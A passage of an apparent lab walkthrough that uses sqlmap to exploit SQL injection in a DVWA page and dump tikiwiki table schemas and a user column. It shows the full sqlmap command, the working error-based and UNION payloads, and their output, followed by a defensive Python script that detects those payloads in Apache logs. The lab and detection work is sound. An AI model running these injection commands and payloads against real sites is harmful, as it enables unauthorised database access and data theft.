| expire   | int(14)   |
| tstamp   | timestamp |
| user     | char(40)  |
+----------+-----------+

Database: tikiwiki
Table: tiki_calendar_locations
[4 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| calendarId  | int(14)      |
| callocId    | int(14)      |
| description | blob         |
| name        | varchar(255) |
+-------------+--------------+

Database: tikiwiki
Table: tiki_cookies
[2 columns]
+----------+---------+
| Column   | Type    |
+----------+---------+
| cookie   | text    |
| cookieId | int(10) |
+----------+---------+

Database: tikiwiki
Table: tiki_forums_queue
[13 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| data         | text         |
| forumId      | int(14)      |
| hash         | varchar(32)  |
| object       | varchar(32)  |
| parentId     | int(14)      |
| qId          | int(14)      |
| summary      | varchar(240) |
| timestamp    | int(14)      |
| title        | varchar(240) |
| topic_smiley | varchar(80)  |
| topic_title  | varchar(240) |
| type         | varchar(60)  |
| user         | varchar(40)  |
+--------------+--------------+

Database: tikiwiki
Table: users_grouppermissions
[3 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| groupName | varchar(255) |
| permName  | varchar(30)  |
| value     | char(1)      |
+-----------+--------------+

Database: tikiwiki
Table: tiki_drawings
[7 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| drawId        | int(12)      |
| filename_draw | varchar(250) |
| filename_pad  | varchar(250) |
| name          | varchar(250) |
| timestamp     | int(14)      |
| user          | varchar(40)  |
| version       | int(8)       |
+---------------+--------------+

Database: tikiwiki
Table: tiki_tracker_fields
[12 columns]
+--------------+--------------+
| Column       | Type         |
+--------------+--------------+
| fieldId      | int(12)      |
| isHidden     | char(1)      |
| isMain       | char(1)      |
| isMandatory  | char(1)      |
| isPublic     | char(1)      |
| isSearchable | char(1)      |
| isTblVisible | char(1)      |
| name         | varchar(255) |
| options      | text         |
| position     | int(4)       |
| trackerId    | int(12)      |
| type         | char(1)      |
+--------------+--------------+

Database: tikiwiki
Table: tiki_chat_users
[3 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| channelId | int(8)       |
| nickname  | varchar(200) |
| timestamp | int(14)      |
+-----------+--------------+

Database: tikiwiki
Table: tiki_content_templates
[4 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| content    | longblob     |
| created    | int(14)      |
| name       | varchar(200) |
| templateId | int(10)      |
+------------+--------------+

Database: tikiwiki
Table: tiki_poll_options
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| optionId | int(8)       |
| pollId   | int(8)       |
| position | int(4)       |
| title    | varchar(200) |
| votes    | int(8)       |
+----------+--------------+

Database: tikiwiki
Table: tiki_blog_activity
[3 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| blogId | int(8)  |
| day    | int(14) |
| posts  | int(8)  |
+--------+---------+

Database: tikiwiki
Table: tiki_mailin_accounts
[17 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| account         | varchar(50)  |
| accountId       | int(12)      |
| active          | char(1)      |
| anonymous       | char(1)      |
| article_topicId | int(4)       |
| article_type    | varchar(50)  |
| attachments     | char(1)      |
| discard_after   | varchar(255) |
| pass            | varchar(100) |
| pop             | varchar(255) |
| port            | int(4)       |
| smtp            | varchar(255) |
| smtpPort        | int(4)       |
| type            | varchar(40)  |
| useAuth         | char(1)      |
| user            | varchar(40)  |
| username        | varchar(100) |
+-----------------+--------------+

Database: tikiwiki
Table: tiki_logs
[7 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| logclient  | text         |
| logId      | int(8)       |
| logip      | varchar(200) |
| logmessage | text         |
| logtime    | int(14)      |
| logtype    | varchar(20)  |
| loguser    | varchar(40)  |
+------------+--------------+

Database: tikiwiki
Table: tiki_live_support_modules
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| modId  | int(4)      |
| name   | varchar(90) |
+--------+-------------+

Database: tikiwiki
Table: tiki_directory_search
[2 columns]
+--------+--------------+
| Column | Type         |
+--------+--------------+
| hits   | int(14)      |
| term   | varchar(250) |
+--------+--------------+

Database: tikiwiki
Table: tiki_tags
[11 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| comment     | varchar(200) |
| data        | longblob     |
| description | varchar(200) |
| flag        | char(1)      |
| hits        | int(8)       |
| ip          | varchar(15)  |
| lastModif   | int(14)      |
| pageName    | varchar(160) |
| tagName     | varchar(80)  |
| user        | varchar(40)  |
| version     | int(8)       |
+-------------+--------------+

Database: tikiwiki
Table: tiki_live_support_messages
[12 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| assigned_to | varchar(200) |
| data        | text         |
| email       | varchar(250) |
| module      | int(4)       |
| msgId       | int(12)      |
| priority    | int(2)       |
| resolution  | varchar(100) |
| status      | char(1)      |
| timestamp   | int(14)      |
| title       | varchar(200) |
| user        | varchar(40)  |
| username    | varchar(200) |
+-------------+--------------+

Database: tikiwiki
Table: tiki_tracker_item_fields
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| fieldId | int(12) |
| itemId  | int(12) |
| value   | text    |
+---------+---------+

Database: tikiwiki
Table: tiki_searchwords
[2 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| searchword | varchar(80) |
| syllable   | varchar(80) |
+------------+-------------+

Database: tikiwiki
Table: tiki_webmail_messages
[6 columns]
+-----------+--------------+
| Column    | Type         |
+-----------+--------------+
| accountId | int(12)      |
| isFlagged | char(1)      |
| isRead    | char(1)      |
| isReplied | char(1)      |
| mailId    | varchar(255) |
| user      | varchar(40)  |
+-----------+--------------+

Database: tikiwiki
Table: tiki_languages
[2 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| lang     | char(16)     |
| language | varchar(255) |
+----------+--------------+

Database: tikiwiki
Table: tiki_user_assigned_modules
[5 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| name     | varchar(200) |
| ord      | int(4)       |
| position | char(1)      |
| type     | char(1)      |
| user     | varchar(40)  |
+----------+--------------+

Database: tikiwiki
Table: tiki_live_support_message_comments
[4 columns]
+-----------+---------+
| Column    | Type    |
+-----------+---------+
| cId       | int(12) |
| data      | text    |
| msgId     | int(12) |
| timestamp | int(14) |
+-----------+---------+

Database: tikiwiki
Table: galaxia_roles
[5 columns]
+-------------+-------------+
| Column      | Type        |
+-------------+-------------+
| description | text        |
| lastModif   | int(14)     |
| name        | varchar(80) |
| pId         | int(14)     |
| roleId      | int(14)     |
+-------------+-------------+

Database: tikiwiki
Table: tiki_content
[2 columns]
+-------------+--------+
| Column      | Type   |
+-------------+--------+
| contentId   | int(8) |
| description | text   |
+-------------+--------+

Database: tikiwiki
Table: tiki_menus
[4 columns]
+-------------+--------------+
| Column      | Type         |
+-------------+--------------+
| description | text         |
| menuId      | int(8)       |
| name        | varchar(200) |
| type        | char(1)      |
+-------------+--------------+

Database: tikiwiki
Table: tiki_live_support_operators
[11 columns]
+-------------------+-------------+
| Column            | Type        |
+-------------------+-------------+
| accepted_requests | int(10)     |
| average_chat      | int(10)     |
| last_chat         | int(14)     |
| longest_chat      | int(10)     |
| points            | int(10)     |
| shortest_chat     | int(10)     |
| status            | varchar(20) |
| status_since      | int(14)     |
| time_online       | int(10)     |
| user              | varchar(40) |
| votes             | int(10)     |
+-------------------+-------------+

[03:49:04] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at 03:49:04

Now we continue with the user dump. Here we want to see which user exists in the tables, so we run sqlmap as before, this time against the tiki_pages table and its user column:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=ee66c40d056596d8e02129bd8ab3f095" -D tikiwiki -T tiki_pages -C user --dump

    sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 05:01:23

[05:01:23] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[05:01:23] [INFO] resuming injection data from session file
[05:01:23] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[05:01:23] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x3a6b6b6d3a,(SELECT (CASE WHEN (6653=6653) THEN 1 ELSE 0 END)),0x3a7462743a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'vtwl'='vtwl&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=' UNION ALL SELECT NULL, CONCAT(0x3a6b6b6d3a,0x6f634747594641726370,0x3a7462743a)# AND 'TOOF'='TOOF&Submit=Submit
---

[05:01:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
> 1
[05:01:27] [INFO] fetching columns LIKE 'user' for table 'tiki_pages' on database 'tikiwiki'
[05:01:27] [INFO] fetching entries of column(s) 'user' for table 'tiki_pages' on database 'tikiwiki'
[05:01:27] [INFO] analyzing table dump for possible password hashes
Database: tikiwiki
Table: tiki_pages
[1 entry]
+-------+
| user  |
+-------+
| admin |
+-------+

[05:01:27] [INFO] Table 'tikiwiki.tiki_pages' dumped to CSV file '/pentest/database/sqlmap/output/192.168.56.101/dump/tikiwiki/tiki_pages.csv'
[05:01:27] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at 05:01:27
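From the defender's side, the two injection points sqlmap reported above (the error-based FLOOR(RAND(0)*2) / GROUP BY subquery and the UNION ALL SELECT with CONCAT(0x..) markers, each closed by an AND 'x'='x tautology) are exactly the shapes that stand out in a web server's access log. The script below is an added example, not code from the original post or from the sqlmap or DVWA projects: it parses Apache combined-format log lines, decodes the query string and flags parameter values that carry those shapes. The log lines are constructed for the demo; the client address 192.168.56.1 (assumed to be the VirtualBox host side of the host-only network) and the user-agent string are assumptions, and the payloads in them are the URL-encoded forms of the payloads sqlmap printed above.

```python
"""Flag sqlmap-style SQL injection probes in Apache access logs.

Added example, not code from the original post. It parses Apache
"combined" log lines, decodes each request's query string and reports
parameter values that carry the payload shapes sqlmap reported against
the DVWA page: error-based FLOOR(RAND(0)*2)/GROUP BY subquery, UNION ALL
SELECT NULL, CONCAT(0x..) markers and 'x'='x tautologies.
All log lines in SAMPLE_LOG are constructed for this demo.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format; only ip, request target and user agent are used.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Indicators derived from the two injection payloads sqlmap reported.
# Whitespace is matched loosely so encoded variants still hit after decoding.
INDICATORS = {
    "union_select": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "error_based_floor_rand": re.compile(
        r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "information_schema": re.compile(r"\bINFORMATION_SCHEMA\.", re.I),
    "hex_concat_marker": re.compile(r"CONCAT\s*\(\s*0x[0-9a-f]+", re.I),
    # closing tautology such as  AND 'vtwl'='vtwl  (backreference: same token twice)
    "quote_tautology": re.compile(r"\b(AND|OR)\s+'([^']*)'\s*=\s*'\2", re.I),
}

# Constructed log lines (assumed client 192.168.56.1, assumed user agents).
SAMPLE_LOG = [
    # normal use of the DVWA page
    '192.168.56.1 - - [26/Oct/2012:03:46:40 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    # error-based probe (the first payload sqlmap reported, URL-encoded)
    '192.168.56.1 - - [26/Oct/2012:03:46:43 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%27%20AND%20%28SELECT%206653%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%280x3a6b6b6d3a%2C%28SELECT%20%28CASE%20WHEN%20%286653%3D6653%29%20THEN%201%20ELSE%200%20END%29%29%2C0x3a7462743a%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27vtwl%27%3D%27vtwl&Submit=Submit HTTP/1.1" 200 4398 "-" "sqlmap/1.0-dev (r4766)"',
    # UNION probe (the second payload sqlmap reported, URL-encoded)
    '192.168.56.1 - - [26/Oct/2012:03:46:44 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%27%20UNION%20ALL%20SELECT%20NULL%2C%20CONCAT%280x3a6b6b6d3a%2C0x6f634747594641726370%2C0x3a7462743a%29%23%20AND%20%27TOOF%27%3D%27TOOF&Submit=Submit HTTP/1.1" 200 4410 "-" "sqlmap/1.0-dev (r4766)"',
    # benign request that merely contains the word "union"
    '192.168.56.1 - - [26/Oct/2012:03:47:01 +0700] "GET /search?q=credit+union HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]


def scan_request(target):
    """Names of the indicators found in any parameter value of one request target."""
    hits = []
    # parse_qsl percent-decodes values and turns '+' into spaces
    for _, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for name, pattern in INDICATORS.items():
            if name not in hits and pattern.search(value):
                hits.append(name)
    return hits


def scan_log(lines):
    """Return one finding per log line that trips at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue  # unparsable line: skip rather than crash on a log oddity
        hits = scan_request(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "ua": m["ua"],
                             "target": m["target"], "indicators": hits})
    return findings


def summarize(findings):
    """Per-source summary: how many flagged requests and which techniques were seen."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f["ip"], {"requests": 0, "indicators": set()})
        entry["requests"] += 1
        entry["indicators"].update(f["indicators"])
    return {ip: {"requests": e["requests"], "indicators": sorted(e["indicators"])}
            for ip, e in summary.items()}


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f["ip"], f["ua"], ", ".join(f["indicators"]))
    print(summarize(found))
```

Only the two sqlmap requests are flagged; the plain id=1 request and the "credit union" search are not, because the patterns require the SQL structure (UNION followed by SELECT, CONCAT opened with a hex literal, a quoted token compared to itself) rather than single keywords. On a real log, replace SAMPLE_LOG with the file's lines; the per-source summary is the useful view, since a sqlmap run produces many such requests from one address in a short time, and the user-agent sqlmap sends by default is itself a tell unless the operator changed it.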

